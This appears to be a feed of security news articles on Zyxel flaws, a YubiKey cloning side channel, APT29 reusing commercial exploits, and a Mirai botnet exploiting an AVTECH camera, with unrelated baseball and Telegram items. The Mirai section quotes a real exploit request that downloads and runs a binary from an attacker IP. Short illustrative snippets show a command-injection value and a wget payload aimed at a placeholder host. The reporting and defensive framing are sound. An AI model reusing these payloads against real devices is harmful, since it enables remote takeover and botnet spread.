Security

After seeing Wi-Fi network named “STINKY,” Navy found hidden Starlink dish on US warship

I need that sweet, sweet wi-fi —

To be fair, it’s hard to live without Wi-Fi.

The USS Manchester. Just the spot for a Starlink dish. (Department of Defense)

It’s no secret that government IT can be a huge bummer. The records retention! The security! So government workers occasionally take IT into their own hands with creative but, err, unauthorized solutions.

For instance, a former US Ambassador to Kenya in 2015 got in trouble after working out of an embassy compound bathroom—the only place where he could use his personal computer (!) to access an unsecured network (!!) that let him log in to Gmail (!!!), where he did much of his official business—rules and security policies be damned.

Still, the ambassador had nothing on senior enlisted crew members of the littoral combat ship USS Manchester, who didn’t like the Navy’s restriction of onboard Internet access. In 2023, they decided that the best way to deal with the problem was to secretly bolt a Starlink terminal to the “O-5 level weatherdeck” of a US warship.

They called the resulting Wi-Fi network “STINKY”—and when officers on the ship heard rumors and began asking questions, the leader of the scheme brazenly lied about it. Then, when exposed, she went so far as to make up fake Starlink usage reports suggesting that the system had only been accessed while in port, where cybersecurity and espionage concerns were lower.

Rather unsurprisingly, the story ends badly, with a full-on Navy investigation and court-martial. Still, for half a year, life aboard the Manchester must have been one hell of a ride.

A photo included in the official Navy investigation report, showing the location of the hidden Starlink terminal on the USS Manchester. (DOD, via Navy Times)

One stinky solution

The Navy Times has all the new and gory details, and you should read their account, because they went to the trouble of using the Freedom of Information Act (FOIA) to uncover the background of this strange story. But the basics are simple enough: People are used to Internet access. They want it, even (perhaps especially!) when at sea on sensitive naval missions to Asia, where concern over Chinese surveillance and hacking runs hot.

So, in early 2023, while in the US preparing for a deployment, Command Senior Chief Grisel Marrero—the enlisted shipboard leader—led a scheme to buy a Starlink for $2,800 and to install it inconspicuously on the ship’s deck. The system was only for use by chiefs—not by officers or by most enlisted personnel—and a Navy investigation later revealed that at least 15 chiefs were in on the plan.

The Navy Times describes how Starlink was installed:

The Starlink dish was installed on the Manchester’s O-5 level weatherdeck during a “blanket” aloft period, which requires a sailor to hang high above or over the side of the ship.

During a “blanket” aloft, duties are not documented in the deck logs or the officer of the deck logs, according to the investigation.

It’s unclear who harnessed up and actually installed the system for Marrero due to redactions in the publicly released copy of the probe, but records show Marrero powered up the system the night before the ship got underway to the West Pacific waters of U.S. 7th Fleet.

This was all extremely risky, and the chiefs don’t appear to have taken amazing security precautions once everything was installed. For one thing, they called the network “STINKY.” For another, they were soon adding more gear around the ship, which was bound to raise further questions. The chiefs found that the Wi-Fi signal coming off the Starlink satellite transceiver couldn’t cover the entire ship, so during a stop in Pearl Harbor, they bought “signal repeaters and cable” to extend coverage.

Sailors on the ship then began finding the STINKY network and asking questions about it. Some of these questions came to Marrero directly, but she denied knowing anything about the network… and then privately changed its Wi-Fi name to “another moniker that looked like a wireless printer—even though no such general-use wireless printers were present on the ship, the investigation found.”

Marrero even went so far as to remove questions about the network from the commanding officer’s “suggestion box” aboard ship to avoid detection.

Finding the stench

Ship officers heard the scuttlebutt about STINKY, of course, and they began asking questions and doing inspections, but they never found the concealed device. On August 18, though, a civilian worker from the Naval Information Warfare Center was installing an authorized SpaceX “Starshield” device and came across the unauthorized SpaceX device hidden on the weatherdeck.

Marrero’s attempt to create fake data showing that the system had only been used in port then failed spectacularly due to the “poorly doctored” statements she submitted. At that point, the game was up, and Navy investigators looked into the whole situation.

All of the chiefs who used, paid for, or even knew about the system without disclosing it were given “administrative nonjudicial punishment at commodore’s mast,” said Navy Times.

Marrero herself was relieved of her post last year, and she pled guilty during a court-martial this spring.

So there you go, kids: two object lessons in poor decision-making. Whether working from an embassy bathroom or the deck of a littoral combat ship, if you’re a government employee, think twice before giving in to the sweet temptation of unsecured, unauthorized wireless Internet access.

Update, Sept. 5, 3:30 pm: A reader has claimed that the default Starlink SSID is actually… “STINKY.” This seemed almost impossible to believe, but Elon Musk in fact tweeted about it in 2022, Redditors have reported it in the wild, and back in 2022 (thanks, Wayback Machine), the official Starlink FAQ said that the device’s “network name will appear as ‘STARLINK’ or ‘STINKY’ in device WiFi settings.” (A check of the current Starlink FAQ, however, shows that the default network name now is merely “STARLINK.”)

In other words, not only was this asinine conspiracy a terrible OPSEC idea, but the ringleaders didn’t even change the default Wi-Fi name until they started getting questions about it. Yikes.

2022 Twitter thread announcing that “STINKY” would be the default SSID for Starlink.

Zyxel warns of vulnerabilities in a wide range of its products

GET YER PATCHING ON —

Most serious vulnerabilities carry severity ratings of 9.8 and 8.1 out of a possible 10.

Getty Images

Networking hardware-maker Zyxel is warning of nearly a dozen vulnerabilities in a wide array of its products. If left unpatched, some of them could enable the complete takeover of the devices, which can be targeted as an initial point of entry into large networks.

The most serious vulnerability, tracked as CVE-2024-7261, can be exploited to “allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device,” Zyxel warned. The flaw, with a severity rating of 9.8 out of 10, stems from the “improper neutralization of special elements in the parameter ‘host’ in the CGI program” of vulnerable access points and security routers. Nearly 30 Zyxel devices are affected. As is the case with the remaining vulnerabilities in this post, Zyxel is urging customers to patch them as soon as possible.
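Zyxel hasn’t published the vulnerable code, but “improper neutralization of special elements” in a parameter that reaches the operating system describes classic OS command injection (CWE-78). The Python sketch below is purely illustrative; the ping example and function names are ours, not Zyxel’s. It shows how a crafted value escapes its intended role when spliced into a shell command string, and the usual fix:

```python
def build_ping_unsafe(host: str) -> str:
    # Vulnerable pattern: an attacker-controlled value is spliced into a
    # string that will be handed to a shell, so metacharacters like ";"
    # terminate the intended command and start a new one.
    return f"ping -c 1 {host}"

def build_ping_safe(host: str) -> list:
    # Safer pattern: allowlist-validate the value, then pass it as a
    # discrete argv element (e.g. to subprocess.run with shell=False).
    if not host or not all(c.isalnum() or c in ".-:" for c in host):
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", host]

# A crafted "host" value becomes two shell commands:
print(build_ping_unsafe("8.8.8.8; cat /etc/passwd"))
```

The crafted-cookie attack Zyxel describes works the same way in spirit: the special characters are never neutralized before the value reaches a command interpreter.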

But wait… there’s more

The hardware manufacturer warned of seven additional vulnerabilities affecting its firewall series, including the ATP, USG FLEX, and USG FLEX 50(W)/USG20(W)-VPN lines. They carry severity ratings ranging from 4.9 to 8.1 and are:

CVE-2024-6343: A buffer overflow vulnerability in the CGI program that could allow an authenticated attacker with administrator privileges to wage denial-of-service attacks by sending crafted HTTP requests.

CVE-2024-7203: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands by executing a crafted CLI command.

CVE-2024-42057: A command injection vulnerability in the IPSec VPN feature that could allow an unauthenticated attacker to run OS commands by sending a crafted username. The attack would be successful only if the device was configured in User-Based-PSK authentication mode and a valid user with a long username exceeding 28 characters exists.

CVE-2024-42058: A null pointer dereference vulnerability in some firewall versions that could allow an unauthenticated attacker to wage DoS attacks by sending crafted packets.

CVE-2024-42059: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands on an affected device by uploading a crafted compressed language file via FTP.

CVE-2024-42060: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute OS commands by uploading a crafted internal user agreement file to the vulnerable device.

CVE-2024-42061: A reflected cross-site scripting vulnerability in the CGI program “dynamic_script.cgi” that could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. The attacker could obtain browser-based information if the malicious script is executed on the victim’s browser.

The remaining vulnerability is CVE-2024-5412 with a severity rating of 7.5. It resides in 50 Zyxel product models, including a range of customer premises equipment, fiber optical network terminals, and security routers. A buffer overflow vulnerability in the “libclinkc” library of affected devices could allow an unauthenticated attacker to wage denial-of-service attacks by sending a crafted HTTP request.

In recent years, vulnerabilities in Zyxel devices have regularly come under active attack. Many of the patches are available for download at links listed in the advisories. In a small number of cases, the patches are available through the cloud. Patches for some products are available only by privately contacting the company’s support team.

Metal bats have pluses for young players, but in the end it comes down to skill

Washington State University scientists conducted batting cage tests of wood and metal bats with young players.

There’s long been a debate in baseball circles about the respective benefits and drawbacks of using wood bats versus metal bats. However, there are relatively few scientific studies on the topic that focus specifically on young athletes, who are most likely to use metal bats. Scientists at Washington State University (WSU) conducted their own tests of wood and metal bats with young players. They found that while there are indeed performance differences between wooden and metal bats, a batter’s skill is still the biggest factor affecting how fast the ball comes off the bat, according to a new paper published in the Journal of Sports Engineering and Technology.

According to physicist and acoustician Daniel Russell of Penn State University—who was not involved in the study but has a long-standing interest in the physics of baseball ever since his faculty days at Kettering University in Michigan—metal bats were first introduced in 1974 and soon dominated NCAA college baseball, youth baseball, and adult amateur softball. Those programs liked the metal bats because they were less likely to break than traditional wooden bats, reducing costs.

Players liked them because it can be easier to control metal bats and swing faster, as the center of mass is closer to the balance point in the bat’s handle, resulting in a lower moment of inertia (or “swing weight”). A faster swing doesn’t mean that a hit ball will travel faster, however, since the lower moment of inertia is countered by a decreased collision efficiency. Metal bats are also more forgiving if players happen to hit the ball away from the proverbial “sweet spot” of the bat. (The definition of the sweet spot is a bit fuzzy because it is sometimes defined in different ways, but it’s commonly understood to be the area on the bat’s barrel that results in the highest batted ball speeds.)

“There’s more of a penalty when you’re not on the sweet spot with wood bats than with the other metal bats,” said Lloyd Smith, director of WSU’s Sport Science Laboratory and a co-author of the latest study. “[And] wood is still heavy. Part of baseball is hitting the ball far, but the other part is just hitting the ball. If you have a heavy bat, you’re going to have a harder time making contact because it’s harder to control.”

Metal bats may also improve performance via a kind of “trampoline effect.” Metal bats are hollow, while wood bats are solid. When a ball hits a wood bat, the ball compresses by as much as 75 percent, and internal friction forces decrease its initial energy by as much as 75 percent. A metal bat barrel behaves more like a spring when it compresses in response to a ball’s impact, so there is much less energy loss. Based on his own research back in 2004, Russell has found that the improved performance of metal bats is linked to the frequency of the barrel’s mode of vibration, aka the “hoop mode.” (Bats with the lowest hoop frequency have the highest performance.)
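The trade-off Smith describes can be seen in the standard bat-ball collision model, in which batted-ball speed is q·v_pitch + (1 + q)·v_bat, where q is the collision efficiency at the impact point. The numbers below are illustrative assumptions, not figures from the WSU study:

```python
def batted_ball_speed(v_pitch, v_bat, q):
    # Standard bat-ball collision model: BBS = q*v_pitch + (1+q)*v_bat,
    # where q is the collision efficiency at the impact point and speeds
    # are in any consistent unit (mph here).
    return q * v_pitch + (1 + q) * v_bat

# Illustrative (made-up) numbers: a lighter metal bat swung slightly
# faster, but with slightly lower collision efficiency, can produce
# nearly the same batted-ball speed as a heavier wood bat.
wood  = batted_ball_speed(70, 65, 0.21)   # slower swing, higher q
metal = batted_ball_speed(70, 68, 0.19)   # faster swing, lower q
print(wood, metal)
```

This is why a lower moment of inertia, and the faster swing it allows, doesn’t translate one-for-one into faster hits: the decreased collision efficiency claws part of the gain back.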

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

ATTACK OF THE CLONES —

Sophisticated attack breaks security assurances of the most popular FIDO key.

Yubico

The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-size device vulnerable to cloning when an attacker gains brief physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller, the Infineon SLE78, which is used in a large number of other authentication devices, including smartcards for banking, electronic passports, and secure-area access. While the researchers have confirmed that all YubiKey 5 series models can be cloned, they haven’t tested other devices that use the SLE78 or its successor microcontrollers, the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers and the Infineon cryptographic library contains the same vulnerability.

Patching not possible

YubiKey-maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse-engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or authentication key.”

Side channels are clues left in physical manifestations, such as electromagnetic emanations, data caches, or the time required to complete a task, that leak cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense, known as constant time, when performing modular inversion operations involving the Elliptic Curve Digital Signature Algorithm. Constant time ensures that the execution time of sensitive cryptographic operations is uniform rather than varying with the specific keys.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.
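The following Python sketch illustrates the principle, not Infineon’s actual code. A textbook Extended Euclidean Algorithm takes a number of loop iterations that depends on the value being inverted, which is exactly the kind of data-dependent timing the attack measures; a fixed-length computation such as a Fermat inverse (valid for a prime modulus, used here purely to illustrate the constant-time idea) does the same work in a data-independent sequence of operations:

```python
def eea_inverse(k, p):
    # Textbook Extended Euclidean Algorithm: the number of loop
    # iterations (and thus the running time) depends on k, the very
    # value that must stay secret when k is an ECDSA nonce.
    old_r, r = k % p, p
    old_s, s = 1, 0
    steps = 0
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        steps += 1
    return old_s % p, steps

def fermat_inverse(k, p):
    # Fixed-length exponentiation: the operation sequence does not
    # depend on k (requires p to be prime).
    return pow(k, p - 2, p)

# The P-256 field prime, used here just as a convenient large prime.
p = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF

inv_a, steps_a = eea_inverse(3, p)
inv_b, steps_b = eea_inverse(12345678901234567890, p)
assert inv_a == fermat_inverse(3, p)
print(steps_a, steps_b)  # different iteration counts: a timing signal
```

NinjaLab’s contribution is measuring those per-value differences not through wall-clock time but through the electromagnetic emanations the computation produces, which an oscilloscope can capture with far finer resolution.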

In Tuesday’s report, NinjaLab co-founder Thomas Roche wrote:

In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon on any security microcontroller family of the manufacturer. This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.

After a long phase of understanding Infineon implementation through side-channel analysis on a Feitian open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 of May 6th, 2024) are affected by the attack. In fact all products relying on the ECDSA of Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability exists for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).

City of Columbus sues man after he discloses severity of ransomware attack

WHISTLEBLOWER IN LEGAL CROSSHAIRS —

Mayor said data was unusable to criminals; researcher proved otherwise.

A ransom note is plastered across a laptop monitor.

A judge in Ohio has issued a temporary restraining order against a security researcher who presented evidence that a recent ransomware attack on the city of Columbus scooped up reams of sensitive personal information, contradicting claims made by city officials.

The order, issued by a judge in Ohio’s Franklin County, came after the city of Columbus fell victim to a ransomware attack on July 18 that siphoned 6.5 terabytes of the city’s data. A ransomware group known as Rhysida took credit for the attack and offered to auction off the data with a starting bid of about $1.7 million in bitcoin. On August 8, after the auction failed to find a bidder, Rhysida released what it said was about 45 percent of the stolen data on the group’s dark web site, which is accessible to anyone with a TOR browser.

Dark web not readily available to public—really?

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross, alleging damages from criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross’s alerting reporters to the information, which it claimed would not be easily obtained by others.

“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The same day, a Franklin County judge granted the city’s motion for a temporary restraining order against Ross. It bars the researcher “from accessing, and/or downloading, and/or disseminating” any city files that were posted to the dark web. The motion was made and granted “ex parte,” meaning in secret before Ross was informed of it or had an opportunity to present his case.

In a press conference Thursday, Columbus City Attorney Zach Klein defended his decision to sue Ross and obtain the restraining order.

“This is not about freedom of speech or whistleblowing,” he said. “This is about the downloading and disclosure of stolen criminal investigatory records. The effect is to get [Ross] to stop downloading and disclosing stolen criminal records to protect public safety.”

The Columbus city attorney’s office didn’t respond to questions sent by email. It did provide the following statement:

The lawsuit filed by the City of Columbus pertains to stolen data that Mr. Ross downloaded from the dark web to his own, local device and disseminated to the media. In fact, several outlets used the stolen data provided by Ross to go door-to-door and contact individuals using names and addresses contained within the stolen data. As has now been extensively reported, Mr. Ross also showed multiple news outlets stolen, confidential data belonging to the City which he claims reveal the identities of undercover police officers and crime victims as well as evidence from active criminal investigations. Sharing this stolen data threatens public safety and the integrity of the investigations. The temporary restraining order granted by the Court prohibits Mr. Ross from disseminating any of the City’s stolen data. Mr. Ross is still free to speak about the cyber incident and even describe what kind of data is on the dark web—he just cannot disseminate that data.

Attempts to reach Ross for comment were unsuccessful. Email sent to the Columbus mayor’s office went unanswered.

A screenshot showing the Rhysida dark web site.

As shown above in the screenshot of the Rhysida dark web site on Friday morning, the sensitive data remains available to anyone who looks for it. Friday’s order may bar Ross from accessing the data or disseminating it to reporters, but it has no effect on those who plan to use the data for malicious purposes.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges by NSO Group and Intellexa that their wares won’t be abused.

Getty Images

Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or strikingly similar to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the commercial surveillance vendors’ exploits were first used as zero-days, meaning they were deployed while the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs Intellexa and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lecigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year. (Google TAG)

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]mn. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lecigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of one NSO Group used in May 2024, when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to an exploit for CVE-2021-37973 that Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

Google TAG

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lecigne wrote.

Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn, paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that the team has observed the threat actor behind the attacks performing DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication that the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019, when exploit code became public. The flaw resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The vulnerability, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publication of CVE-2024-7029.
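Exploit attempts like the ones Akamai logged arrive percent-encoded, so the first analysis step is simply parsing and decoding them. A minimal sketch of that step in Python; the sample payload below is hypothetical, modeled on the published description of the flaw, not taken from Akamai's logs:

```python
from urllib.parse import urlparse, parse_qs

SHELL_METACHARACTERS = set(";|`$&")

def decode_params(raw_url: str) -> dict:
    """Parse a captured request URL; parse_qs percent-decodes the values."""
    query = urlparse(raw_url).query
    return {k: v[0] for k, v in parse_qs(query).items()}

def looks_injected(value: str) -> bool:
    """Flag parameter values containing shell metacharacters."""
    return any(ch in SHELL_METACHARACTERS for ch in value)

# Hypothetical log entry: a shell command smuggled through the brightness
# argument of the 'action=' parameter, the injection point in CVE-2024-7029.
logged = ("/cgi-bin/supervisor/Factory.cgi?action=set_factory"
          "&brightness=1%3B%20wget%20http%3A%2F%2Fexample.invalid%2Fbot")

params = decode_params(logged)
print(params["brightness"])  # the ';' reveals the injected command
```

The decoded `brightness` value comes back as `1; wget http://example.invalid/bot`, making the injection obvious once the encoding is stripped.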

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Fig. 1: Decoded payload body of the exploit attempts

Akamai

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
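A request like this is easy to flag in HTTP logs: the unusual upgrade path combined with `$( ... )` command-substitution syntax rarely appears in legitimate traffic. A hedged sketch of such a check; the regex is illustrative, not a vetted detection rule:

```python
import re

# Illustrative detector for CVE-2017-17215-style requests: the Huawei
# upgrade endpoint combined with shell command substitution in the body.
EXPLOIT_RE = re.compile(r"/ctrlt/DeviceUpgrade_1.*\$\(.*busybox", re.DOTALL)

def flag_request(raw_request: str) -> bool:
    """Return True if the raw HTTP request matches the exploit pattern."""
    return bool(EXPLOIT_RE.search(raw_request))
```

Real intrusion-detection rules (for example, in Snort or Suricata dialects) would match on more robust features, but the same two markers anchor them.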

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.
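The malware's spreading behavior also suggests a quick audit: checking whether devices on a network you administer answer on the Telnet ports the variant probes. A minimal sketch in Python; the camera address in the comment is hypothetical, and this should only be run against networks you own:

```python
import socket

TELNET_PORTS = (23, 2323, 37215)  # ports the Corona Mirai variant probes

def open_ports(host: str, ports=TELNET_PORTS, timeout: float = 1.0) -> list:
    """Return the subset of ports on which host accepts a TCP connection."""
    found = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            pass  # closed, filtered, or unreachable
    return found

# Example: audit a camera on your own LAN (address is hypothetical).
# print(open_ports("192.168.1.50"))
```

Any device answering on these ports with default credentials is a candidate for recruitment into a botnet like this one.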

Unpatchable 0-day in surveillance cam is being exploited to install Mirai


Shocker: French make surprise arrest of Telegram founder at Paris airport

quelle surprise —

Lack of moderation on Telegram claimed to be reason for arrest.

Pavel Durov, Telegram founder and former CEO of VKontakte, in happier (and younger) days.

Late this afternoon at a Parisian airport, French authorities detained Pavel Durov, the founder of the Telegram messaging/publication service. They are allegedly planning to hit him tomorrow with serious charges related to abetting terrorism, fraud, money laundering, and crimes against children, all of it apparently stemming from a near-total lack of moderation on Telegram. According to French authorities, thanks to its encryption and support for crypto, Telegram has become the new top tool for organized crime.

The French outlet TF1 had the news first from sources within the investigation. (Reuters and CNN have since run stories as well.) TF1’s source said, “Pavel Durov will definitely end up in pretrial detention. On his platform, he allowed an incalculable number of offenses and crimes to be committed, which he does nothing to moderate, nor does he cooperate.”

Durov is a 39-year-old who gained a fortune by building VKontakte, a Russian version of Facebook, before being forced out of his company by the Kremlin. He left Russia and went on to start Telegram, which became widely popular, especially in Europe. He was arrested today when his private plane flew from Azerbaijan to Paris’s Le Bourget Airport.

Telegram has become a crucial news outlet for Russians, as it is one of the few uncensored channels for non-Kremlin voices within Russia. It has also become the top outlet for nationalistic Russian “milbloggers” writing about the Ukraine war. Durov’s arrest has already led to outright panic among many of them, in part due to the secrets his arrest might expose—but also because the platform is commonly used by Russian forces to communicate.

As Rob Lee, a senior fellow at the Foreign Policy Research Institute, noted tonight, “A popular Russian channel says that Telegram is also used by Russian forces to communicate, and that if Western intelligence services gain access to it, they could obtain sensitive information about the Russian military.”

Right-wing and crypto influencers are likewise angry over the arrest, writing things like, “This is a serious attack on freedom. Today, they target an app that promotes liberty; tomorrow, they will go after DeFi. If you claim to support crypto, you must show your support. #FreeDurov. It’s time for digital resistance.”

